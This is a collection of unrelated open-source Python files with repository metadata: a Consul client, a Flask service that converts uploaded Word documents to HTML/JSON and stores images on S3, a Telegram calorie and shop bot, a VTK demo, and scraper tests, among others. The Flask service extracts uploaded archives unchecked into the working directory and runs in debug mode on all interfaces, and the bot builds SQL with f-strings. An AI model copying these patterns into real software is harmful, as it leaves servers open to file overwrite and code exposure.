                    # BUG FIX: the original f-string interpolated the builtin
                    # `dict` type instead of the payload being uploaded.
                    print(f'上传字典{dict_to_upload}失败,正在重试')
                    time.sleep(1)

    def download_key_value(self, key: str, default: any = None, keys: bool = False) -> any:
        """Fetch *key* from the KV store.

        With keys=True returns the list of matching keys; otherwise returns
        the JSON-decoded value, or *default* when the key is absent.
        """
        index, data = self.consul.kv.get(key, keys=keys)
        if not data:
            return default
        if keys:
            return data
        return json.loads(data['Value'].decode('utf-8'))

    def discover_services(self, service_name: str) -> List[List[str]]:
        """Return [address, port] for every healthy instance of the service.

        Falls back to [[]] on any lookup failure (kept for caller
        compatibility).
        """
        # TODO: cache the lookup table and refresh it when WatchKVThread
        # detects a change (original author's note).
        try:
            services = self.consul.health.service(service_name, passing=True)[1]
            return [[svc.get('Service', {}).get('Address', ''), svc.get('Service', {}).get('Port', '')]
                    for svc in services]
        except Exception:
            return [[]]

    def discover_service(self, service_name: str) -> Union[List[str], None]:
        """Return one healthy [address, port] chosen at random, else None."""
        services = self.discover_services(service_name)
        if not services:
            return None
        return random.choice(services)

    def check_port_available(self, sname: str, sip: str, sport: Union[int, str]) -> bool:
        """True when no *other* registered service already uses sip:sport."""
        if sip == '0.0.0.0' or sip == '127.0.0.1':
            sip = socket.gethostbyname(socket.gethostname())
        # Collect every registered instance's (ip, port), grouped by service.
        services = self.consul.agent.services()
        service_instances = {}
        for service_id in services:
            service_name = services[service_id]['Service']
            _, instances = self.consul.health.service(service_name, passing=True)
            for instance in instances:
                ip = instance['Service']['Address']
                port = instance['Service']['Port']
                service_instances.setdefault(service_name, []).append((ip, port))
        # Conflict = same endpoint claimed by a differently-named service.
        for name, instances in service_instances.items():
            for ip, port in instances:
                if sip == ip and sport == port and sname != name:
                    print(f'{ip}:{port}已被{name}占用')
                    return False
        return True

    def register_consul(self, app: Flask, name: str, port: Union[str, int], tags: List[str]) -> None:
        """Register the service before app startup; remember the service id
        in app.config['id'] for later deregistration."""
        service_id = self.register_service(name, port, tags)
        app.config.update({'id': service_id})

    def deregister_service(self, service_or_app) -> None:
        """Deregister a service from the Consul agent after shutdown.

        Accepts either a service-id string or a Flask app whose
        config['id'] holds the id.

        BUG FIX: the original class defined deregister_service twice; the
        surviving (app-based) definition called `self.deregister_service(self,
        id)`, which always raised a TypeError. The two definitions are merged
        here so both call styles work.
        """
        if isinstance(service_or_app, str):
            service_id = service_or_app
        else:
            service_id = service_or_app.config['id']
        self.consul.agent.service.deregister(service_id)
| dzming-git/DzMicro | dzmicro/utils/network/consul_client.py | consul_client.py | py | 9,967 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "threading.Thread",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "dzmicro.utils.singleton_server_manager.get_server_unique_info",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "dzmicro.utils.singleton_server_manager",
"line_number": 2... |
20324309262 | # -*- coding: utf-8 -*-
from django import forms
from bson.objectid import ObjectId
#from lib import get_db
class rich_form(forms.Form):
def as_read(self):
rt=''
for k,v in self.cleaned_data.iteritems():
rt+='<tr><td>'
rt+=str(self.field[k].label)
rt+='</td><td>'
if type(v)==list:
for ite in v:
rt+=str(ite)
else:
rt+=str(v)
rt+='</td></tr>'
def set_choices(self,fieldname,newlist):
self.fields[fieldname].choices=newlist
# class email_login(forms.Form):
# email=forms.EmailField(
# label=u'公司邮箱',
# strip=True,
# required=True,
# )
# password=forms.CharField(
# widget=forms.widgets.PasswordInput,
# label=u'密码',
# required=True,
# )
# department=forms.TypedChoiceField(
# label=u'部门',
# choices=[
# ['finance',u'财务部'],
# ['it',u'资讯科技部'],
# ],
# )
# taskname=forms.CharField(
# widget=forms.widgets.HiddenInput,
# )
# fileup=forms.FileField(
# label=u'文件',
# ) | raynardj/terminus | major/share/upgrade/forms.py | forms.py | py | 1,011 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.forms.Form",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "django.forms",
"line_number": 6,
"usage_type": "name"
}
] |
40097713775 | import flask
import os
import zipfile
from docx.api import Document
from flask import request, jsonify
from flask_s3 import *
from io import BytesIO
from werkzeug.utils import secure_filename
import boto3
from s3_credential import *
import pypandoc
from bs4 import BeautifulSoup
from datetime import datetime
import json
import uuid
import time
s3 = FlaskS3()
app = flask.Flask(__name__)
app.config["DEBUG"] = True
app.config['UPLOAD_FOLDER'] = os.path.join('word','media')
app.config['FLASKS3_BUCKET_NAME'] = os.environ.get("AWS_BUCKET_NAME")
app.config['AWS_ACCESS_KEY_ID'] = os.environ.get("AWS_ACCESS_KEY_ID")
app.config['AWS_SECRET_ACCESS_KEY'] = os.environ.get("AWS_SECRET_ACCESS_KEY")
app.config['FLASKS3_BUCKET_DOMAIN'] = 's3.ap-south-1.amazonaws.com'
s3.init_app(app)
s3_boto = boto3.client('s3')
s3_res = boto3.resource("s3")
buck = s3_res.Bucket(os.environ.get("AWS_BUCKET_NAME"))
def generate_unique_name(length=10):
    """Return a unique PNG filename, e.g. 'img1620000000a1b2c3d4e5.png'.

    *length* is the number of random hex characters appended after the epoch
    timestamp. Fixes in this version: the original used the glibc-only
    strftime("%s") directive (non-portable) and ignored *length* entirely,
    so two calls within the same second collided.
    """
    timestamp = int(time.time())
    suffix = uuid.uuid4().hex[:length]
    return f"img{timestamp}{suffix}.png"
def get_url(key):
# Build a presigned GET URL for *key* in the bucket named by the
# AWS_BUCKET_NAME environment variable.
# NOTE(review): ExpiresIn=9600 keeps links valid for 160 minutes -- confirm
# that lifetime is intended.
url = s3_boto.generate_presigned_url(
ClientMethod='get_object',
Params={
'Bucket': os.environ.get("AWS_BUCKET_NAME"),
'Key': key
},
ExpiresIn=9600)
return url
@app.route("/upload-document",methods=["POST"])
def uploadDocument():
document = request.files.get("file",False)
if(document):
memfile = BytesIO()
document.save(memfile)
document = Document(memfile)
tables = document.tables
z = zipfile.ZipFile(memfile)
z.extractall()
all_files = z.namelist()
# print(all_files)
images = filter(lambda x: x.startswith('/word/media/'), all_files)
# return "yo"
rels = {}
real_name = {}
for r in document.part.rels.values():
if isinstance(r._target, docx.parts.image.ImagePart):
file_location = '/word/media/'+secure_filename(generate_unique_name())
fbinary = open(f'word/media/{os.path.basename(r._target.partname)}',"rb")
file_url_upload = os.path.join("/media/docimages",os.path.basename(file_location))
s=buck.put_object(Body=fbinary.read(),Key=file_url_upload)
rels[r.rId] = get_url(file_url_upload)
# print(s.generate_presigned_url(expires_in=0))
real_name[r.rId] = os.path.basename(r._target.partname)
# Data will be a list of rows represented as dictionaries
# containing each row's data.
data = []
keys = None
topic_id = ''
get_string = ""
#print(dir(table.columns))
for table in tables :
tr = {}
for i, row in enumerate(table.rows):
tr[row.cells[0].text] = ''
for paragraph in row.cells[1].paragraphs:
if(row.cells[0].text == 'Topic ID'):
topic_id = row.cells[1].text
for rId in rels:
if rId in paragraph._p.xml:
z.extract('word/media/'+real_name[rId],os.getcwd())
tr[row.cells[0].text]+=f'<img src="{rels[rId]}">'
if(row.cells[0].text == 'Problem Statement' or row.cells[0].text == 'Correct Answer Explanation') :
# print(paragraph.font.superscripipt)
print(paragraph._element.xml)
get_string+=paragraph._element.xml+"\n"
tr[row.cells[0].text]+='<p>'+paragraph.text+'</p>'
# print(paragraph.style.font.superscript)
else :
tr[row.cells[0].text]+=paragraph.text
data.append(tr)
allData = {}
allData['document'] = {}
allData['document']['Topic ID'] = topic_id
allData['document']['questions'] = data
with open("output.xml",'w') as file:
file.write(get_string)
return jsonify(allData)
def arrangeData(data,variable,image_hash_data):
if(data[1].findChild()):
if(len(data[1].findAll("img"))):
img_data = data[1].findAll("img")
for i,img in enumerate(img_data):
if(image_hash_data.get(os.path.basename(img["src"]))):
object_url = "https://app.xxxx.com/{1}/{2}".format(
s3_boto.get_bucket_location(Bucket='xxxx-media')['LocationConstraint'],
'media/docimages',image_hash_data.get(os.path.basename(img["src"])))
img_data[i]["src"] = object_url
variable[data[0].text] = str(data[1]).replace("<td>", "").replace("</td>", "")
else:
variable[data[0].text] = data[1].text
# print(type(data[1]))
# print(data[1])
else:
variable[data[0].text] = data[1].text
return variable
def preprocessData(data,image_hash_data):
tr_data = data.findAll("tr")
result_recv = {}
for i,tr in enumerate(tr_data):
result = tr_data[i]["class"]
if(result[0]!="header"):
all_data = tr_data[i].findAll("td")
# print(all_data[0],all_data[1])
if(len(all_data)):
arrangeData(all_data, result_recv,image_hash_data)
else:
all_data = tr.findAll("th")
arrangeData(all_data, result_recv,image_hash_data)
return result_recv
@app.route("/api/json",methods=["POST"])
def preprocessDocFunc():
document = request.files.get("file",False)
image_hash_data = {}
errros_arr = []
all_data = []
topic_id = ""
if(document):
try:
document.save("static/predoc.docx")
# document = Document(memfile)
# tables = document.tables
real_file_path = "static/predoc.docx"
real_file_stream = open(real_file_path,"rb")
z = zipfile.ZipFile(real_file_stream)
z.extractall()
all_files = z.namelist()
# images_data = filter(lambda x:x.startwith("word/media"), all_files)
for i in all_files:
if(i.startswith("word/media")):
#unique_name = secure_filename(generate_unique_name())
unique_name = secure_filename(str(time.time())+uuid.uuid4().hex)
fbinary = open(os.path.join(os.getcwd(),f'word/media/{os.path.basename(i)}'),"rb")
file_url_upload = os.path.join("media/docimages",unique_name)
s=buck.put_object(Body=fbinary.read(),Key=file_url_upload)
image_hash_data[os.path.basename(i)] = unique_name
html = pypandoc.convert_file(real_file_path, 'html',extra_args=['--webtex'])
parser = BeautifulSoup(html,"html.parser").findAll("table")
topic_id = (parser[0].find(text="Topic ID").findNext("th") if parser[0].find(text="Topic ID").findNext("th") else parser[0].find(text="Topic ID").findNext("td")).text
all_data = [preprocessData(tdata,image_hash_data) for tdata in parser if preprocessData(tdata,image_hash_data)]
except Exception as e:
errros_arr.append(str(e))
return {
"document":{
"Topic ID":topic_id,
"questions":all_data
},
"errors":errros_arr
}
@app.route("/api/html",methods=["POST"])
def htmlresponse():
document = request.files.get("file",False)
image_hash_data = {}
errros_arr = []
all_data = []
topic_id = ""
if(document):
try:
document.save("static/predoc.docx")
# document = Document(memfile)
# tables = document.tables
real_file_path = "static/predoc.docx"
real_file_stream = open(real_file_path,"rb")
z = zipfile.ZipFile(real_file_stream)
z.extractall()
all_files = z.namelist()
# images_data = filter(lambda x:x.startwith("word/media"), all_files)
for i in all_files:
if(i.startswith("word/media")):
unique_name = secure_filename(str(time.time())+uuid.uuid4().hex)
#print(unique_name)
#exit()
fbinary = open(os.path.join(os.getcwd(),f'word/media/{os.path.basename(i)}'),"rb")
file_url_upload = os.path.join("media/docimages",unique_name)
s=buck.put_object(Body=fbinary.read(),Key=file_url_upload)
image_hash_data[os.path.basename(i)] = unique_name
time.sleep(1)
html = pypandoc.convert(real_file_path,'html',extra_args=['--mathjax'])
parser = BeautifulSoup(html,"html.parser").findAll("img")
img_data = parser
resp = str(html)
for i,img in enumerate(img_data):
if(image_hash_data.get(os.path.basename(img["src"]))):
old_img = img_data[i]['src']
object_url = "https://app.xxxx.com/{1}/{2}".format(
s3_boto.get_bucket_location(Bucket='xxxx-media')['LocationConstraint'],
'media/docimages',image_hash_data.get(os.path.basename(img["src"])))
resp = resp.replace(old_img,object_url )
except Exception as e:
errros_arr.append(str(e))
return resp
if __name__ == '__main__':
app.run(host='0.0.0.0', port=5000)
app.run() | ActiKnow/docx-to-html-json | index.py | index.py | py | 9,727 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 25,
"usage_type": "attribute"
},
{
"api_name": "os.environ.get",
"line_numb... |
1154715752 | import os
from flask import Flask
from src.models import migrate, db
from src.command import data_load_command
from src.api import api
config_variable_name = 'FLASK_CONFIG_PATH'
default_config_path = os.path.join(os.path.dirname(__file__), 'config/local.py')
os.environ.setdefault(config_variable_name, default_config_path)
def create_app(config_file=None, settings_override=None):
app = Flask(__name__)
if config_file:
app.config.from_pyfile(config_file)
else:
app.config.from_envvar(config_variable_name)
if settings_override:
app.config.update(settings_override)
@app.cli.command("load_docs")
def load_docs():
data_load_command()
init_app(app)
api.init_app(app)
return app
def init_app(app):
db.init_app(app)
migrate.init_app(app, db)
#api.init_app(app)
| shano/document_keyword_analysis | app.py | app.py | py | 849 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.join",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "os.path.dirname",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "os.environ.setdefault",
... |
2063174381 | # -*- coding: utf-8 -*-
"""
@title: test_convert_spectra.py
@description: Example Python script to test the spectra data converter and to test reloading the converted spectra data
@author: chrisarcadia
@created: 2018/10/26
"""
import Bruker
import matplotlib.pyplot as pyplot
import h5py
import numpy
# Convert a data file
try:
input_filename = r'C:\Users\ChrisTow\Desktop\Examples\single\Mix_1_100_1.d';
output_filename = r'C:\Users\ChrisTow\Desktop\Converted\single\Mix_1_100_1.hdf5';
settings = Bruker.get_measurement_settings(input_filename);
positions = settings['positions'];
Bruker.convert_settings(output_filename, settings);
Bruker.convert_data_spectra(input_filename,output_filename,settings);
converted = 1;
except:
converted = 0; # do nothing if file already exists
# Load the converted data
hf = h5py.File(output_filename, 'r');
spec = hf.get('spectra/');
index = 0;
mz = numpy.array(spec['mass_to_charge'][index,:]);
signal = numpy.array(spec['signal'][index,:]);
info = {}
for k in spec.attrs.keys():
info.update({k:spec.attrs[k]});
hf.close();
print('Data Info:')
print(info);
# Plot one of the spectra
pyplot.plot(mz,signal, 'bo', markersize=1)
pyplot.ylabel('Signal')
pyplot.xlabel('M/Z')
pyplot.grid(True)
pyplot.show()
| scale-lab/AcidBaseNetworks | simulations/chemcpupy/automation/Bruker/test_convert_spectra.py | test_convert_spectra.py | py | 1,382 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "Bruker.get_measurement_settings",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "Bruker.convert_settings",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "Bruker.convert_data_spectra",
"line_number": 21,
"usage_type": "call"
},
{
... |
71578947943 | # !/usr/bin/env python
import vtk
def get_program_parameters():
import argparse
description = 'Highlighting a selected object with a silhouette.'
epilogue = '''
Click on the object to highlight it.
The selected object is highlighted with a silhouette.
'''
parser = argparse.ArgumentParser(description=description, epilog=epilogue,
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('numberOfSpheres', nargs='?', type=int, default=10,
help='The number of spheres, default is 10.')
args = parser.parse_args()
return args.numberOfSpheres
class MouseInteractorHighLightActor(vtk.vtkInteractorStyleTrackballCamera):
def __init__(self, silhouette=None, silhouetteActor=None):
self.AddObserver("LeftButtonPressEvent", self.onLeftButtonDown)
self.LastPickedActor = None
self.Silhouette = silhouette
self.SilhouetteActor = silhouetteActor
def onLeftButtonDown(self, obj, event):
clickPos = self.GetInteractor().GetEventPosition()
# Pick from this location.
picker = vtk.vtkPropPicker()
picker.Pick(clickPos[0], clickPos[1], 0, self.GetDefaultRenderer())
self.LastPickedActor = picker.GetActor()
# If we picked something before, remove the silhouette actor and
# generate a new one.
if self.LastPickedActor:
self.GetDefaultRenderer().RemoveActor(self.SilhouetteActor)
# Highlight the picked actor by generating a silhouette
self.Silhouette.SetInputData(self.LastPickedActor.GetMapper().GetInput())
self.GetDefaultRenderer().AddActor(self.SilhouetteActor)
# Forward events
self.OnLeftButtonDown()
return
def SetSilhouette(self, silhouette):
self.Silhouette = silhouette
def SetSilhouetteActor(self, silhouetteActor):
self.SilhouetteActor = silhouetteActor
def main():
numberOfSpheres = get_program_parameters()
colors = vtk.vtkNamedColors()
# A renderer and render window
renderer = vtk.vtkRenderer()
renderer.SetBackground(colors.GetColor3d('SteelBlue'))
renderWindow = vtk.vtkRenderWindow()
renderWindow.SetSize(640, 480)
renderWindow.AddRenderer(renderer)
# An interactor
interactor = vtk.vtkRenderWindowInteractor()
interactor.SetRenderWindow(renderWindow)
# Add spheres to play with
for i in range(numberOfSpheres):
source = vtk.vtkSphereSource()
# random position and radius
x = vtk.vtkMath.Random(-5, 5)
y = vtk.vtkMath.Random(-5, 5)
z = vtk.vtkMath.Random(-5, 5)
radius = vtk.vtkMath.Random(.5, 1.0)
source.SetRadius(radius)
source.SetCenter(x, y, z)
source.SetPhiResolution(11)
source.SetThetaResolution(21)
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(source.GetOutputPort())
actor = vtk.vtkActor()
actor.SetMapper(mapper)
r = vtk.vtkMath.Random(.4, 1.0)
g = vtk.vtkMath.Random(.4, 1.0)
b = vtk.vtkMath.Random(.4, 1.0)
actor.GetProperty().SetDiffuseColor(r, g, b)
actor.GetProperty().SetDiffuse(.8)
actor.GetProperty().SetSpecular(.5)
actor.GetProperty().SetSpecularColor(colors.GetColor3d('White'))
actor.GetProperty().SetSpecularPower(30.0)
renderer.AddActor(actor)
# Render and interact
renderWindow.Render()
# Create the silhouette pipeline, the input data will be set in the
# interactor
silhouette = vtk.vtkPolyDataSilhouette()
silhouette.SetCamera(renderer.GetActiveCamera())
# Create mapper and actor for silhouette
silhouetteMapper = vtk.vtkPolyDataMapper()
silhouetteMapper.SetInputConnection(silhouette.GetOutputPort())
silhouetteActor = vtk.vtkActor()
silhouetteActor.SetMapper(silhouetteMapper)
silhouetteActor.GetProperty().SetColor(colors.GetColor3d("Tomato"))
silhouetteActor.GetProperty().SetLineWidth(5)
# Set the custom type to use for interaction.
style = MouseInteractorHighLightActor(silhouette, silhouetteActor)
style.SetDefaultRenderer(renderer)
# Start
interactor.Initialize()
interactor.SetInteractorStyle(style)
renderWindow.SetWindowName('HighlightWithSilhouette')
renderWindow.Render()
interactor.Start()
if __name__ == "__main__":
main()
| lorensen/VTKExamples | src/Python/Picking/HighlightWithSilhouette.py | HighlightWithSilhouette.py | py | 4,453 | python | en | code | 319 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "argparse.RawTextHelpFormatter",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "vtk.vtkInteractorStyleTrackballCamera",
"line_number": 21,
"usage_type": "attr... |
8604753979 | import telebot
from telebot import types
import config
import values
import sqlite3
# Registration BOT using TOKEN
bot = telebot.TeleBot(config.TOKEN)
# Registration DB
db = sqlite3.connect('DB/catalog.db', check_same_thread=False)
sql = db.cursor()
# For reading USER's HEIGHT
def height(message, word):
weight = message.text
msg = bot.send_message(message.chat.id, 'Введи свой рост (в сантиметрах):\n')
bot.register_next_step_handler(msg, calc, (weight, word))
# For reading AGE or printing INDEX of body mass
def calc(message, lis):
h = int(message.text) / 100
w = int(lis[0])
if lis[1] == 'Калории':
msg = bot.send_message(message.chat.id, f'Введи свой возраст:\n')
bot.register_next_step_handler(msg, age, (h * 100, w))
elif lis[1] == 'Индекс':
bot.send_photo(message.chat.id, photo=open('vals.png', 'rb'),
caption=f'Ваш индекс массы тела:\n{round(w / (h ** 2), 2)}',
parse_mode='html')
# For printing necessary number of calories and reading about type of activity
def age(message, data):
w = data[1] * 9.99
h = data[0] * 6.25
a = int(message.text) * 4.92
pre_result = round(w + h - a)
bot.send_message(message.chat.id, f'<em><b>{pre_result}</b></em> — '
f'Столько калорий необходимо вам для того, '
f'чтобы просто существовать.',
parse_mode='html')
msg = bot.send_message(message.chat.id, values.description, parse_mode='html')
bot.register_next_step_handler(msg, activity, pre_result)
# printing necessary number of calories
def activity(message, res):
result = round(res * values.values[message.text])
bot.send_message(message.chat.id, f'Для похудения необходимо <b>{result - 400} -- {result - 200}</b> калорий\n'
f'Необходимо потреблять <b>{result}</b>'
f' калорий в день чтобы нормально восстанавливаться\n'
f'Для набора массы необходимо <b>{result + 200} -- {result + 400}</b> калорий\n',
parse_mode='html')
# Read data from DB (item shop) using user_id
def read_from_items_db(user_id):
data = [el for el in sql.execute(f"SELECT * FROM items WHERE rowid = {values.user_list[str(user_id)][0]}")]
# print(data)
return data
# Creating keyboard for card (below)
def create_markup_for_card():
keyboard = types.InlineKeyboardMarkup()
key_1 = types.InlineKeyboardButton(text='⬅ Предыдущий товар', callback_data='previous')
key_2 = types.InlineKeyboardButton(text='Следующий товар ➡', callback_data='next')
key_3 = types.InlineKeyboardButton(text='🗑 Добавить в корзину', callback_data='add_in_basket')
keyboard.row(key_1, key_2)
keyboard.add(key_3)
return keyboard
# Send message with data about item (card of item)
def send_item(message):
data = read_from_items_db(message.from_user.id)[0]
markup = create_markup_for_card()
if data[4] - data[3] != 0:
cost = f'{round(data[3])} - {round(data[4])}'
else:
cost = round(data[3])
try:
msg_id = message.chat.id
except:
msg_id = message.message.chat.id
bot.send_photo(msg_id,
open(data[5], 'rb'),
caption=f'\n<b>{data[2]}</b>\n\n'
f'Цена: <b>{cost} RUB</b>\n\n'
f'<em>Описание: {data[6].capitalize()}</em>\n'
f'\nВес: {round(data[-1] * 1000)} g.',
parse_mode='html',
reply_markup=markup)
# Is User in values.user_list
def test_of_being_in_list(msg_data):
if not (str(msg_data.from_user.id) in values.user_list):
values.iter_var_changer(msg_data.from_user.id, 1, True)
# How many notes in DB
def count_of_strings():
sql.execute("SELECT rowid FROM items")
return len(sql.fetchall())
# Getting data from DB about item in USER's basket
def get_data_from_basket(message):
user_basket = values.user_list[str(message.from_user.id)][1]
message_text = '\n'
for el, count in user_basket.items():
data = sql.execute(f"SELECT name FROM items WHERE rowid = {int(el)}").fetchone()[0]
message_text += f'\n• {data} = <b>{count} шт.</b>\n'
return message_text
def create_markup_for_basket(message):
try:
msg_id = message.id
except:
msg_id = message.message.id
keyboard = types.InlineKeyboardMarkup()
key_1 = types.InlineKeyboardButton(text='❌ Очистить корзину ❌', callback_data=f'clear_basket_{msg_id}')
key_2 = types.InlineKeyboardButton(text='📋 Оформить заказ ', callback_data='create_order')
keyboard.row(key_1)
keyboard.row(key_2)
return keyboard
def response_for_check_basket(message):
try:
msg_id = message.id
chat_id = message.chat.id
except:
msg_id = message.message.id
chat_id = message.message.chat.id
text = get_data_from_basket(message)
if text == '\n':
keyboard = types.InlineKeyboardMarkup()
keyboard.add(types.InlineKeyboardButton(text='OK', callback_data=f'ok_{msg_id}'))
text = 'Корзина пуста!'
else:
keyboard = create_markup_for_basket(message)
bot.send_message(chat_id=chat_id,
text=f'{text}',
parse_mode='html',
reply_markup=keyboard)
"""
###########################################################
------ Starting of actions with different 'handlers' ------
###########################################################
"""
@bot.message_handler(commands=['calc'])
def characteristics(message):
mark = types.ReplyKeyboardMarkup(resize_keyboard=True)
mark.row(
'Индекс',
'Калории',
)
bot.send_message(message.chat.id, 'Что вы хотите узнать?', reply_markup=mark)
@bot.message_handler(commands=['hello', 'hi', 'sup'])
def greeting(message):
msg = bot.send_photo(message.chat.id, open('photos/Rock.jpg', 'rb'))
keyboard = types.InlineKeyboardMarkup()
key_1 = types.InlineKeyboardButton(text='Привет', callback_data=f'hi_{msg.id}')
key_2 = types.InlineKeyboardButton(text='Пока', callback_data=f'bye_{msg.id}')
keyboard.row(key_1, key_2)
msg = bot.send_message(message.chat.id,
f'Перед тобой бот для подсчета калорий'
f' <b>{bot.get_me().first_name}</b>',
parse_mode='html',
reply_markup=keyboard)
@bot.message_handler(commands=['market', 'shop', 'store'])
def market(message):
menu = types.ReplyKeyboardMarkup(resize_keyboard=True)
menu.row(
'Каталог',
'Корзина'
)
# menu.add('')
bot.send_message(message.chat.id, 'Добро пожаловать в магазин!\nИспользуйте меню для навигации: ',
reply_markup=menu)
test_of_being_in_list(message)
@bot.message_handler(content_types=['text'])
def handler(message):
if message.text == 'Индекс' or message.text == 'Калории':
word = message.text
msg = bot.send_message(message.chat.id, 'Введи свой вес:\n')
bot.register_next_step_handler(msg, height, word)
elif message.text == 'Каталог':
test_of_being_in_list(message)
send_item(message)
elif message.text == 'Корзина':
response_for_check_basket(message)
@bot.callback_query_handler(func=lambda call: True)
def callback(call):
test_of_being_in_list(call)
data = call.data.split('_')
if data[0] == 'hi' or data[0] == 'bye':
bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.id,
text=f'{values.for_greet[data[0]]} {call.from_user.first_name}!')
bot.delete_message(call.message.chat.id, data[1])
if call.data == 'next':
index = values.user_list[str(call.from_user.id)]
if index[0] < count_of_strings():
values.iter_var_changer(call.from_user.id, index[0] + 1)
else:
values.iter_var_changer(call.from_user.id, 1)
send_item(call)
elif call.data == 'previous':
index = values.user_list[str(call.from_user.id)]
if index[0] > 1:
values.iter_var_changer(call.from_user.id, index[0] - 1)
else:
values.iter_var_changer(call.from_user.id, count_of_strings())
send_item(call)
elif call.data == 'add_in_basket':
index = values.user_list[str(call.from_user.id)]
try:
count = values.user_list[str(call.from_user.id)][1][str(index[0])]
values.add_item(call.from_user.id, index[0], count + 1)
except Exception as ex:
# print(f'Firstly!{"#" * 10}Exception: {ex}')
values.add_item(call.from_user.id, index[0], 1)
bot.answer_callback_query(callback_query_id=call.id, text='\nТовар добавлен в корзину!\n')
# for user, data in values.user_list.items():
# print(f' |||{user} --- {data}|||')
elif data[0] == 'ok':
# bot.edit_message_text(chat_id=call.message.chat.id, text='Продолжайте покупки!', message_id=call.message.id)
try:
bot.delete_message(chat_id=call.message.chat.id, message_id=call.message.id)
bot.delete_message(chat_id=call.message.chat.id, message_id=data[1])
except Exception as ex:
print(ex)
elif data[0] + '_' + data[1] == 'clear_basket':
values.clear_basket(call.from_user.id)
try:
bot.delete_message(call.message.chat.id, data[2])
bot.delete_message(call.message.chat.id, call.message.id)
except Exception as ex:
print(ex)
bot.answer_callback_query(call.id)
bot.polling(none_stop=True)
| Abrahamlink/body-bot | bot.py | bot.py | py | 10,450 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "telebot.TeleBot",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "config.TOKEN",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "sqlite3.connect",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "values.description",
... |
37775727462 | # https://leetcode-cn.com/problems/reverse-string/
# 编写一个函数,其作用是将输入的字符串反转过来。输入字符串以字符数组 char[] 的形式给出。
#
# 不要给另外的数组分配额外的空间,你必须原地修改输入数组、使用 O(1) 的额外空间解决这一问题。
#
# 你可以假设数组中的所有字符都是 ASCII 码表中的可打印字符。
#
# 示例 1:
#
# 输入:["h","e","l","l","o"]
# 输出:["o","l","l","e","h"]
# 示例 2:
#
# 输入:["H","a","n","n","a","h"]
# 输出:["h","a","n","n","a","H"]
from typing import List
class Solution:
# 直接交换,交换次数为数组长度除以2的整数商
def reverseString(self, s: List[str]) -> None:
"""
Do not return anything, modify s in-place instead.
"""
if not s:
return
times = len(s) // 2
for i in range(times):
s[i], s[-(i + 1)] = s[-(i + 1)], s[i]
# 简化方案
def reverseString2(self, s: List[str]) -> None:
s[:] = s[::-1]
# 双指针
def reverseString3(self, s: List[str]) -> None:
"""
Do not return anything, modify s in-place instead.
"""
l, r = 0, len(s) - 1
while l < r:
s[l], s[r] = s[r], s[l]
l += 1
r -= 1
# python 有个 reverse 函数,可以直接翻转列表
| cookie-rabbit/LeetCode_practice | 专题/入门/字符串/344 反转字符串/1.py | 1.py | py | 1,403 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "typing.List",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "typing.List",
"line_number": 33,
"usage_type": "name"
},
{
"api_name": "typing.List",
"line_number": 37,
"usage_type": "name"
}
] |
31833081682 | import pytest
from bs4 import BeautifulSoup
import nerdtracker_client.constants.stats as ntc_stats
from nerdtracker_client.scraper import (
create_scraper,
parse_tracker_html,
retrieve_page_from_tracker,
retrieve_stats,
retrieve_stats_multiple,
)
class TestScraper:
@pytest.mark.slow
@pytest.mark.filterwarnings("ignore::DeprecationWarning")
def test_retrieve_page_from_tracker(
self, valid_activision_user_string
) -> None:
scraper = create_scraper()
soup = retrieve_page_from_tracker(
scraper, valid_activision_user_string, cold_war_flag=True
)
# Check that the soup object does not contain a failed request message
failed_string = "Enable JavaScript and cookies to continue"
assert failed_string not in soup.text
@pytest.mark.slow
@pytest.mark.filterwarnings("ignore::DeprecationWarning")
def test_retrieve_invalid_page_from_tracker(
self, invalid_activision_user_string
) -> None:
scraper = create_scraper()
soup = retrieve_page_from_tracker(
scraper, invalid_activision_user_string, cold_war_flag=True
)
# Check that the soup object contains a failed stats message
failed_string = "stats not found"
assert failed_string in soup.text
@pytest.mark.slow
@pytest.mark.filterwarnings("ignore::DeprecationWarning")
def test_retrieve_empty_page_from_tracker(
self, empty_activision_user_string
) -> None:
scraper = create_scraper()
soup = retrieve_page_from_tracker(
scraper, empty_activision_user_string, cold_war_flag=True
)
# Check that the soup object contains a failed stats message
failed_string = "404 Page not Found"
assert failed_string in soup.text
class TestParseTrackerHtml:
def test_parse_tracker_html(
self, html_page: str, joy_stats: ntc_stats.StatColumns
) -> None:
soup = BeautifulSoup(html_page, "html.parser")
stats = parse_tracker_html(soup)
assert stats == joy_stats
class TestRetrieve:
@pytest.mark.slow
@pytest.mark.filterwarnings("ignore::DeprecationWarning")
def test_retrieve_stats(
self,
valid_activision_user_string: str,
joy_stats: ntc_stats.StatColumns,
) -> None:
stats = retrieve_stats(valid_activision_user_string, cold_war_flag=True)
if stats == {}:
pytest.skip("Cloudflare challenge detected, skipping test")
assert stats == joy_stats
@pytest.mark.slow
@pytest.mark.filterwarnings("ignore::DeprecationWarning")
def test_retrieve_stats_multiple(
self,
activision_user_string_list: list[str],
stat_list: list[ntc_stats.StatColumns | dict | None],
) -> None:
stats = retrieve_stats_multiple(
